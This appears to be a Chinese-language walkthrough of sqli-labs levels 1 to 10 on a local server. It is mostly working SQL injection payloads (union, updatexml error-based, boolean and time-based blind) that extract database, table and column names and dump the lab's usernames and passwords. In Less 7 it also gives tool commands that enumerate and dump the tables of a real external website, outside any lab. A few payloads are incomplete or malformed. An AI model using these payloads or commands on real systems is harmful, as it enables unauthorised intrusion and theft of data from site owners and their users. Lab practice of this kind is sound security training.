SQL练习,用的自己装的服务器,127.0.0.1/sqli/Less-1
题解(部分的结果附在了后面)(看的时候注意,有些是答案附在了后面)
Less 1
联合查询
求列数
?id=1' order by 4%23
?id=1' order by 3%23(共3列)
求显示位
?id=1' and 1=2 union select 1,2,3%23
求数据库名
?id=1' and 1=2 union select 1,2,database()%23 security
?id=1' and 1=2 union select 1,database(),3%23 security
求表名
?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23 emails,referers,uagents,users
求列名
?id=1' and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password
求字段内容
?id=1' and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23
Dumb#Dumb,Angelina#I-kill-you,Dummy#p@ssword,secure#crappy,stupid#stupidity,superman#genious,batman#mob!le,admin#1,admin1#admin1,admin2#admin2,admin3#admin3,dhakkan#dumbo,admin4#admin4,admin'##a
Less 2
除了闭合字符是数字型,其余做法与Less 1相同
?id=1 and 1=1%23
?id=1 order by 3%23
?id=1 and 1=2 union select 1,2,3%23
?id=1 and 1=2 union select 1,2,database()%23
?id=1 and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23 emails,less42,referers,uagents,users
?id=1 and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password
?id=1 and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23
Less 3
基于报错的注入(xpath做法)
?id=1')and 1=1%23
求库名
?id=1')and updatexml(1,concat(0x23,database()),1)%23 security
求表名
?id=1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23 emails,less42,referers,uagents
求列名
?id=1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23 id,username,password
求字段
?id=1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23 Dumb#Dumb,Angelina#I-kill-you,D
Less 4
除了闭合字符是”)的以外,其余与Less 3相同
?id=1")and 1=1%23
?id=1")and updatexml(1,concat(0x23,database()),1)%23 security
?id=1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
?id=1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
?id=1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23
Less 5
本题就是页面有所不同,但具体做法与Less 3相同
id=1'and 1=1%23
求库名
?id=1'and updatexml(1,concat(0x23,database()),1)%23
求表名
?id=1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
求列名
?id=1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
求字段内容
?id=1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23
Less 6
本体依然是xpath做法
id=1"and 1=1%23
求库名
s
求表名
?id=1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23
求列名
?id=1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23
求字段内容
?id=1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23
Less 7
此题与之前的题都不同,由于不会爆数据库表名等,所以可以根据数据库名、表名、列名、字段名的长度进行盲注
布尔型盲注
?id=1'))and 1=1%23
求数据库长度
?id=1')) and length(database())=8%23
求数据库名的ascii码
?id=1')) and ascii(substr(database(),1,1))=115%23 s
?id=1')) and ascii(substr(database(),2,1))=101%23 e
?id=1')) and ascii(substr(database(),3,1))=99%23 c
?id=1')) and ascii(substr(database(),4,1))=117%23 u
?id=1')) and ascii(substr(database(),5,1))=114%23 r
?id=1')) and ascii(substr(database(),6,1))=105%23 i
?id=1')) and ascii(substr(database(),7,1))=116%23 t
?id=1')) and ascii(substr(database(),8,1))=121%23 y
表的数量
id=1'))and (select count(table_name) from information_schema.tables where table_schema='security')=4%23
求表名的ascii码
id=1'))and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23
求列的数量
id=1'))and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23
求列名的ascii码
id=1'))and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105%23
求字段的数量
id=1'))and (select count(username) from security.users)=13%23
求字段名的内容
id=1'))and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23
表名、列名、字段名求的方法雷同,由于盲注很麻烦,所以做题时先考虑联合查询和xpath
用小葵软件测试简便方式:
如:
-u "http://www.romanianwriters.ro/s.php?id=1" --dbs
-u "http://www.romanianwriters.ro/s.php?id=1" --table -D "romanian_svc"
-u "http://www.romanianwriters.ro/s.php?id=1" --columns -T "ra_autori" -D "romanian_svc"
-u "http://www.romanianwriters.ro/s.php?id=1" --dump -C"autoportret,biografie,biografie_prev,id,nume,nume_nd" -T "ra_autori" -D "romanian_svc"
Less 8
与Less 7做法相同
?id=1'and 1=1%23
求数据库的长度
?id=1' and length(database())=8%23
求数据库的ascii的值
?id=1' and ascii(substr(database(),1,1))=115%23 s
?id=1' and ascii(substr(database(),2,1))=101%23 e
?id=1' and ascii(substr(database(),3,1))=99%23 c
?id=1' and ascii(substr(database(),4,1))=117%23 u
?id=1' and ascii(substr(database(),5,1))=114%23 r
?id=1' and ascii(substr(database(),6,1))=105%23 i
?id=1' and ascii(substr(database(),7,1))=116%23 t
?id=1' and ascii(substr(database(),8,1))=121%23 y
求表的数量
?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=4%23
求表的ascii码的值
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 e
?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109%23 m
求列的数量
id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23
Less 9
基于时间的盲注
求数据库名的长度
?id=1' and if(length(database())=8,sleep(3),1) %23
求数据库名的ascii码
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),4,1))=117,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),6,1))=105,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),7,1))=116,sleep(5),1)%23
?id=1' and if(ascii(substr(database(),8,1))=121,sleep(5),1)%23
求表的数量
?id=1'and if(select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)%23
求列的数量
id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)%23
Less 10
与Less 9做法相同
?id=1"and if(length(database())=8,sleep(4),1) %23